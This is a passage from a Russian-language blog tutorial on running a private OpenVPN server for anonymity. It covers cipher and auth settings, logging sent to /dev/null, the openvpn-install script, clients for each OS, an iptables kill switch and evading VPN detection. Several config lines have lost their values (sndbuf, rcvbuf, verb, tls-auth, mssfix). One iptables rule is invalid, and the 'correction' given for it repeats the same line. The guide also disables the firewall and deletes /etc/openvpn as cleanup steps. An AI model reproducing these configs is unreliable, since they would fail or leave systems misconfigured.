  &lt;p&gt;Если вас не блокируют, то лучше я думаю UDP. Сам юзаю UDP. На сервере и клиенте должен быть указан один протокол.&lt;/p&gt;
  &lt;pre&gt;Port 16122
&lt;/pre&gt;
  &lt;p&gt;На какой порт повесить? Лучше на нестандартный, как у меня. Или замаскировать под какой-то сервис — 443/ssl для tcp и 53/dns для udp&lt;/p&gt;
  &lt;pre&gt;cipher AES-256-CBC
&lt;/pre&gt;
  &lt;p&gt;Какое шифрование использовать?&lt;/p&gt;
  &lt;p&gt;Используйте AES-256-CBC или AES-128-CBC. Если явно не задать, то по-умолчанию будет исопльзоваться Blowfish (cipher BF-CBC). Этот параметр должен быть и на сервере и на клиенте. Если на сервере есть, на клиенте нет или они отличаются, может не законнектить.&lt;/p&gt;
  &lt;pre&gt;auth SHA512
&lt;/pre&gt;
  &lt;p&gt;Если не задавать, будет использоваться auth SHA1. Используйте auth SHA512 или auth SHA256. Этот параметр должен быть и на сервере и на клиенте. Если на сервере есть, на клиенте нет или они отличаются, может не законнектить.&lt;/p&gt;
  &lt;pre&gt;#status /dev/null 2&amp;amp;gt;&amp;amp;amp;1
&lt;/pre&gt;
  &lt;p&gt;По умолчанию будет записываться в файл какой-то, какие клиенты сейчас онлайн. Чтобы ничего не писало, нужно закомментировать строку. Я также ЗАЧЕМ то написал /dev/null 2&amp;gt;&amp;amp;1 …&lt;/p&gt;
  &lt;pre&gt;log /dev/null 2&amp;amp;gt;&amp;amp;amp;1
&lt;/pre&gt;
  &lt;p&gt;Это то самое логирование OpenVPN которое для безопасности лучше выключить. Дело в том, что выключить его нельзя, а если закоментировать, то логи будут писаться в /var/log/syslogПоэтому я раскоментировал и сказал писать в /dev/null.&lt;/p&gt;
  &lt;pre&gt;push &amp;quot;dhcp-option DNS 8.8.8.8&amp;quot;
push &amp;quot;dhcp-option DNS 8.8.4.4&amp;quot;
&lt;/pre&gt;
  &lt;p&gt;Какие DNS юзать?&lt;/p&gt;
  &lt;p&gt;Юзайте паблик DNS от Google (8.8.8.8 и 8.8.4.4.) или от OpenDNS (208.67.222.222 и 208.67.220.220).&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;Утечка DNS под Windows и Linux&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Если вы будете юзать этот конфиг на Windows, в конфиг добавляем следующую строку:&lt;/p&gt;
  &lt;pre&gt;setenv opt block-outside-dns
&lt;/pre&gt;
  &lt;p&gt;Да, вот так просто. Под MacOS с Tunnelblick все норм.&lt;/p&gt;
  &lt;p&gt;А под Linux есть файл update-resolv-conf, который находится в папке /etc/openvpn на клиентской машине. Файл может иметь название или update-resolv-conf или update-resolv-conf.sh. Поэтому на клиентском Линукс вводим в терминале:&lt;/p&gt;
  &lt;pre&gt;ls /etc/openvpn | grep update
&lt;/pre&gt;
  &lt;p&gt;И узнаем название файла.&lt;/p&gt;
  &lt;p&gt;Далее, в конфиг .ovpn нужно вставить следующие строки:&lt;/p&gt;
  &lt;pre&gt;script-security 2
up /etc/openvpn/update-resolv-conf
down /etc/openvpn/update-resolv-conf
&lt;/pre&gt;
  &lt;p&gt;где update-resolv-conf — название файла, которое вы получили выше.&lt;/p&gt;
  &lt;p&gt;Перекидываем конфиг .ovpn с серва на клиент.&lt;/p&gt;
  &lt;p&gt;Можете просто открыть клиентский конфиг, скопировать все полностью и вставить у себя на машине, окда.&lt;/p&gt;
  &lt;p&gt;Если вы создавали пользователя и запрещали ssh коннект от рута, то первым делом нужно поместить .ovpn конфиг в домашнюю папку созданного пользователя. У меня это был pp-ruloh&lt;/p&gt;
  &lt;pre&gt;cp /etc/openvpn/easy-rsa/keys/client1/client.ovpn /home/pp-ruloh
&lt;/pre&gt;
  &lt;p&gt;Изменить права у файла:&lt;/p&gt;
  &lt;pre&gt;chown pp-ruloh:pp-ruloh /home/pp-ruloh/client.ovpn
&lt;/pre&gt;
  &lt;p&gt;Linux. Будем юзать sftp.&lt;/p&gt;
  &lt;pre&gt;sftp -P 1488 pp-ruloh@ip
&lt;/pre&gt;
  &lt;p&gt;где 1488 — порт на котором слушает sshd.&lt;/p&gt;
  &lt;p&gt;Как законнектились, мы уже будем в домашней папке pp-ruloh. Можем посмотреть файлы — вводим ls.&lt;/p&gt;
  &lt;p&gt;копируем конфиг:&lt;/p&gt;
  &lt;pre&gt;get client.ovpn ~/
&lt;/pre&gt;
  &lt;p&gt;Windows, linux, MacOS: скачиваем программу для работы по FTP — FileZilla и подключаемся к серву по sftp. Нужено будет указать port sftp (у меня 1488), пользователя (pp-ruloh, ибо руту зарпетили). Копируем файл куда хотим и радуемся. Как пользоваться программой разберетесь сами.&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;Поднимаем OpenVPN скриптом&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Поднять OpenVPN вручную вам не под силу? Не отчаивайтесь, у меня для вас хорошие новости!&lt;/p&gt;
  &lt;p&gt;На Github существует Open Source скрипт, который позволяет быстро и легко поднять OpenVPN сервер на вашем VPS. Скрипт называтся openvpn-install, и вот ссылка на &lt;a href=&quot;https://helpugroup.ru/goto/https://github.com/Nyr/openvpn-install&quot; target=&quot;_blank&quot;&gt;Github&lt;/a&gt;. И этого скрипта есть куча форков, которые вы можете изучить.&lt;/p&gt;
  &lt;p&gt;Посмотреть исходный код можно &lt;a href=&quot;https://helpugroup.ru/goto/https://github.com/Nyr/openvpn-install/blob/master/openvpn-install.sh&quot; target=&quot;_blank&quot;&gt;здесь&lt;/a&gt;. Приступим. Работаем под пользователем root или суперпользователем.&lt;/p&gt;
  &lt;p&gt;Для начала, обновим систему:&lt;/p&gt;
  &lt;pre&gt;apt-get update &amp;amp;amp;&amp;amp;amp; apt-get dist-upgrade -y
&lt;/pre&gt;
  &lt;p&gt;Если вы уже пытались поднять OpenVPN вручную, но у вас ничего не получилось, то нужно сначала его полностью снести. Удаляем openvpn:&lt;/p&gt;
  &lt;pre&gt;apt-get remove --purge openvpn
&lt;/pre&gt;
  &lt;p&gt;удаляем папку:&lt;/p&gt;
  &lt;pre&gt;rm -rf /etc/openvpn/
&lt;/pre&gt;
  &lt;p&gt;выключаем ufw:&lt;/p&gt;
  &lt;pre&gt;ufw disable
&lt;/pre&gt;
  &lt;p&gt;и установим нужные пакеты:&lt;/p&gt;
  &lt;pre&gt;apt-get install -y sudo nano curl perl python wget git iptables openvpn openssl ca-certificates
&lt;/pre&gt;
  &lt;p&gt;Скачиваем скрипт в домашнюю папку root:&lt;/p&gt;
  &lt;pre&gt;git clone https://github.com/Nyr/openvpn-install.git ~/nyr-openvpn
&lt;/pre&gt;
  &lt;p&gt;Переходим туда:&lt;/p&gt;
  &lt;pre&gt;cd ~/nyr-openvpn/
&lt;/pre&gt;
  &lt;p&gt;Запускаем скрипт:&lt;/p&gt;
  &lt;pre&gt;bash openvpn-install.sh
&lt;/pre&gt;
  &lt;p&gt;И вы попадете в так называемый Инсталятор. Где нужно будет отвечать на вопросы или что-то вписывать. Для перехода на следующий этап установки жмите Enter.&lt;/p&gt;
  &lt;p&gt;Первый делом, предложит ввести внешний IP адрес, но вероятнее всего скрипт сам его определит:&lt;/p&gt;
  &lt;pre&gt;IP address: 111.222.111.222
&lt;/pre&gt;
  &lt;p&gt;Следующий этап, выбрать протокол. Кликаете 1 и выбираете UDP. Далее, выбираете порт. В статье указакана 14000. После этого предложит выбрать DNS сервера. Выбор будет из Google, OpenDNS или текущих, которые на VPS и еще каких-то. Мы выбираем OpenDNS, жмите 3. После этого предложит ввести имя клиента. Мы ввели «pp-ruloh». Далее начнется скачивание-утановка пакетов, генерация ключей, сертификатов и конфигурационных файлов. когда все закончится, он поместит конфиг. в домашнюю папку юзера, от имени которого запсукался скрипт. То есть, сейчас конфиг лежит по адресу:&lt;/p&gt;
  &lt;pre&gt;/root/
&lt;/pre&gt;
  &lt;p&gt;Собственно, на этом конфигурация OpenVPN скриптом завершается. Можно уже сейчас взять новый конфиг и использовать. Посмотрим на конфиг pp-ruloh.ovpn:&lt;/p&gt;
  &lt;pre&gt;nano ~/pp-ruloh.ovpn
&lt;/pre&gt;
  &lt;p&gt;(без ключей и сертификатов)&lt;/p&gt;
  &lt;pre&gt;client
dev tun
proto udp
sndbuf 
rcvbuf 
remote 111.222.111.222 14000
resolv-retry infinite
nobind
persist-key
persist-tun
remote-cert-tls server
cipher AES-256-CBC
comp-lzo
setenv opt block-outside-dns
key-direction 1
verb 3
&lt;/pre&gt;
  &lt;p&gt;Все вроде бы нормально, да лучше auth SHA512 явно указать. Поэтому добавим&lt;/p&gt;
  &lt;pre&gt;auth SHA512
&lt;/pre&gt;
  &lt;p&gt;Вот так:&lt;/p&gt;
  &lt;pre&gt;client
dev tun
proto udp
sndbuf 
rcvbuf 
remote 111.222.111.222 14000
resolv-retry infinite
nobind
persist-key
persist-tun
remote-cert-tls server
cipher AES-256-CBC
auth SHA512
comp-lzo
setenv opt block-outside-dns
key-direction 1
verb 3
&lt;/pre&gt;
  &lt;p&gt;Обратите внимание, что скрипт уже активен для предотвращения утечки DNS под клиент Windows:&lt;/p&gt;
  &lt;pre&gt;setenv opt block-outside-dns
&lt;/pre&gt;
  &lt;p&gt;Если у вас Linux или MacOS — эту строку лучше закомментировать.&lt;/p&gt;
  &lt;p&gt;Теперь посмотрим на серверный конфиг server.conf:&lt;/p&gt;
  &lt;pre&gt;nano /etc/openvpn/server.conf
port 14000
proto udp
dev tun
sndbuf 
rcvbuf 
ca ca.crt
cert server.crt
key server.key
dh dh.pem
tls-auth ta.key 
topology subnet
server 10.8.0.0 255.255.255.0
ifconfig-pool-persist ipp.txt
push &amp;quot;redirect-gateway def1 bypass-dhcp&amp;quot;
push &amp;quot;dhcp-option DNS 208.67.222.222&amp;quot;
push &amp;quot;dhcp-option DNS 208.67.220.220&amp;quot;
keepalive 10 120
cipher AES-256-CBC
comp-lzo
user nobody
group nogroup
persist-key
persist-tun
status openvpn-status.log
verb 3
crl-verify crl.pem
&lt;/pre&gt;
  &lt;p&gt;Здесь также добавляем auth SHA512 (а то работать не будет, если на клиенте указан а на сервере нет), делаем verb 0. Также нужно проделать следующее. Нужно закомментировать строку.&lt;/p&gt;
  &lt;pre&gt;status openvpn-status.log
&lt;/pre&gt;
  &lt;p&gt;И добавить log:&lt;/p&gt;
  &lt;pre&gt;log /dev/null 2&amp;amp;gt;&amp;amp;amp;1
&lt;/pre&gt;
  &lt;p&gt;Где-то выше писал, зачем он нужен. Получилось так:&lt;/p&gt;
  &lt;pre&gt;port 14000
proto udp
dev tun
sndbuf 
rcvbuf 
ca ca.crt
cert server.crt
key server.key
dh dh.pem
tls-auth ta.key 
topology subnet
server 10.8.0.0 255.255.255.0
ifconfig-pool-persist ipp.txt
push &amp;quot;redirect-gateway def1 bypass-dhcp&amp;quot;
push &amp;quot;dhcp-option DNS 208.67.222.222&amp;quot;
push &amp;quot;dhcp-option DNS 208.67.220.220&amp;quot;
keepalive 10 120
cipher AES-256-CBC
auth SHA512
comp-lzo
user nobody
group nogroup
persist-key
persist-tun
#status openvpn-status.log
log /dev/null 2&amp;amp;gt;&amp;amp;amp;1
verb 
crl-verify crl.pem
&lt;/pre&gt;
  &lt;p&gt;Берем клиентский файл-конфиг и помещаем на ваше устройство. Об этом я писал выше.&lt;/p&gt;
  &lt;p&gt;При повторном запуске скрипта из-под рута:&lt;/p&gt;
  &lt;pre&gt;bash /root/nyr-openvpn/openvpn-install.sh
&lt;/pre&gt;
  &lt;p&gt;Скрипт предложит создать нового клиент, удалить существующего (не сможет больше коннектиться) или удалить OpenVPN.&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;Клиенты OpenVPN под разные ОС&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Поскольку OpenVPN не встроен по-умолчанию ни в одну популярную ОС, то требуется установить сторонее ПО — клиент OpenVPN.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Windows&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Под Windows есть официальный клиент, называется OpenVPN GUI. Скачать его можно на офф. сайте &lt;a href=&quot;https://helpugroup.ru/goto/https://openvpn.net/index.php/open-source/downloads.html&quot; target=&quot;_blank&quot;&gt;OpenVPN&lt;/a&gt;. Скачиваете, устанавливаете. Появится ярлык на раб. столе, после запуска — иконка в трее.&lt;/p&gt;
  &lt;p&gt;Далее, помещаете ваш .ovpn файл в папку config, в установленной папке OpenVPN. В общем, если устанавливать OpenVPN GUI по-умолчанию в папку Program Files, то адрес такой:&lt;/p&gt;
  &lt;pre&gt;C:\Program Files\OpenVPN\config
&lt;/pre&gt;
  &lt;p&gt;В эту папку кидаем конфиги .ovpn. Потом из трея можно запускать VPN. Все достаточно просто.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Linux&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;На Линукс в репозиориях вашего дистрибутива пакет скорее всего будет называется «openvpn» (еще может openvpn-client), и ставится следующим образом:&lt;/p&gt;
  &lt;pre&gt;sudo apt-get install openvpn
&lt;/pre&gt;
  &lt;p&gt;Если у вас Debian-подобные дистрибутивы (Debian, Ubuntu, Mint). Если у вас дистрибутив другой линейки — сами разберетесь как ставить.&lt;/p&gt;
  &lt;p&gt;Работает это следующим образом. У вас есть .ovpn файл, далее вы в терминале вводите команду:&lt;/p&gt;
  &lt;pre&gt;sudo openvpn --config &amp;amp;lt;путь до файла .ovpn&amp;amp;gt;
&lt;/pre&gt;
  &lt;p&gt;где &amp;lt;путь до файла .ovpn&amp;gt;, собственно, путь до файла .ovpn.&lt;/p&gt;
  &lt;p&gt;Или можете скормить файл network-manager ‘ у.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;MacOS&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Под MacOS из клиентов OpenVPN подходит Tunnelblick. Скачать его можно &lt;a href=&quot;https://helpugroup.ru/goto/https://tunnelblick.net/downloads.html&quot; target=&quot;_blank&quot;&gt;здесь&lt;/a&gt;. Устанавливается просто, требует права суперпользователя. По-умолчанию будет отправлять файлы с расширением .ovpn. Будет иконка в трее, там конектимся. Можно настроить, что бы коннектился к OpenVPN сразу при загрузке системы. Когда соеденение обрывается с VPN, интернет пропадает. В этом случае нужно вручную отсоединяться от VPN.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Android&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Официальный клиент OpenVPN Connect под Android доступен для скачивания на &lt;a href=&quot;https://helpugroup.ru/goto/https://play.google.com/store/apps/details?id=de.blinkt.openvpn&amp;hl=nl&quot; target=&quot;_blank&quot;&gt;Google Play&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;iOS&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Для iOS клиент скачиваем из &lt;a href=&quot;https://helpugroup.ru/goto/https://itunes.apple.com/ru/app/openvpn-connect/id590379981?mt=8&quot; target=&quot;_blank&quot;&gt;AppStore&lt;/a&gt;.&lt;/p&gt;
  &lt;p&gt;Клиенты, предоставляемые провайдером VPN. Некоторые провайдеры предоставляеют свой собственный OpenVPN клиент под разные ОС и платформы. Использовать их или нет, решать вам. Но это потенциально не очень безопасно.&lt;/p&gt;
  &lt;p&gt;Список vpn, которые 100% ведут логи можете найти в этой &lt;a href=&quot;https://helpugroup.ru/osnovy-bezopasnosti-v-internete-ot-a-do-ya/&quot; target=&quot;_blank&quot;&gt;статье&lt;/a&gt;.&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;Запрещаем весь траффик не через OpenVPN на клиенте&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Правила iptables. Только для адептов Луникса. Что делать если VPN внезапно отключился? Или вы забыли его включить вообще? Обычно, когда внезапно обнаруживаешь, что траффик идет не через VPN, и при этом ты не используешь Whonix, то через 3 секунды понимаешь, что твои штаны полны говна. Что нужно делать чтобы явно ограничить весь траффик?&lt;/p&gt;
  &lt;p&gt;А вот и сами правила:&lt;/p&gt;
  &lt;pre&gt;# запрещаем все входящие и исходящие
iptables -P INPUT DROP
iptables -P OUTPUT DROP

# разрешаем уже установленные соединения и локалхост
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

# разрешаем соединения до VPN (VPN_IP заменить на ip вашего VPN сервера)
iptables -A OUTPUT -d VPN_IP -j ACCEPT

# разрешаем любые соединения через VPN
iptables -A OUTPUT -o tun+ -j ACCEPT
&lt;/pre&gt;
  &lt;p&gt;В конце:&lt;/p&gt;
  &lt;pre&gt;# разрешаем любые соединения через VPN
iptables -A OUTPUT -i tun+ -j ACCEPT
&lt;/pre&gt;
  &lt;p&gt;Было изменено на:&lt;/p&gt;
  &lt;pre&gt;# разрешаем любые соединения через VPN
iptables -A OUTPUT -i tun+ -j ACCEPT
&lt;/pre&gt;
  &lt;p&gt;Есть у нас правила, что дальше? Теперь открываем терминал в вашем Линуксе&lt;/p&gt;
  &lt;p&gt;И создаем файл, который назовем vpn.rules:&lt;/p&gt;
  &lt;pre&gt;touch ~/vpn-rules.sh
&lt;/pre&gt;
  &lt;p&gt;Поместим туда все правила:&lt;/p&gt;
  &lt;pre&gt;nano ~/vpn-rules.sh
&lt;/pre&gt;
  &lt;p&gt;В самом верху файла пишем:&lt;/p&gt;
  &lt;pre&gt;#!/bin/sh
&lt;/pre&gt;
  &lt;p&gt;Далее, правила из кода выше. Копируете — вставляете, меняете&lt;/p&gt;
  &lt;pre&gt;# разрешаем соединения до VPN (VPN_IP заменить на ip вашего VPN сервера)
iptables -A OUTPUT -d VPN_IP -j ACCEPT
&lt;/pre&gt;
  &lt;p&gt;там где VPN_IP на IP вашего сервера (указан в .ovpn конфиге).&lt;/p&gt;
  &lt;p&gt;Сохраняете — закрываете.&lt;/p&gt;
  &lt;p&gt;Запсукае скрипт из под рута или sudo:&lt;/p&gt;
  &lt;pre&gt;sudo sh ~/vpn-rules.sh
&lt;/pre&gt;
  &lt;p&gt;Теперь у вас применились правила. Можете проверить — без VPN интернет работать не будет. Этот скрипт можно запускать каждый раз. Так же можно сохранить правила:&lt;/p&gt;
  &lt;pre&gt;sudo iptables-save &amp;amp;gt; /etc/iptables/iptables.rules
&lt;/pre&gt;
  &lt;p&gt;И сделать сервис iptables автозапускающимся при загрузки системы:&lt;/p&gt;
  &lt;pre&gt;systemctl enable iptables
&lt;/pre&gt;
  &lt;p&gt;На этом все.&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;Боремся с детектом OpenVPN&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;VPN может детектироваться конечным ресурсом (например сайт) какими-то хитро-выебанными способами. Для начала можете читануть статью на &lt;a href=&quot;https://helpugroup.ru/goto/https://habrahabr.ru/post/216295/&quot; target=&quot;_blank&quot;&gt;хабре&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;Заходим на &lt;a href=&quot;https://helpugroup.ru/goto/https://browserleaks.com/ip&quot; target=&quot;_blank&quot;&gt;browserleaks.com&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;И смотрим строку «TCP/IP OS Fingerprinting»&lt;/p&gt;
  &lt;p&gt;Что делать?&lt;/p&gt;
  &lt;p&gt;Если у вас, конфиг UDP, то можно проделать следующее. нужно прописать&lt;/p&gt;
  &lt;pre&gt;mssfix 
&lt;/pre&gt;
  &lt;p&gt;На клиенте .ovpn и сервере server.conf&lt;/p&gt;

</content></entry></feed>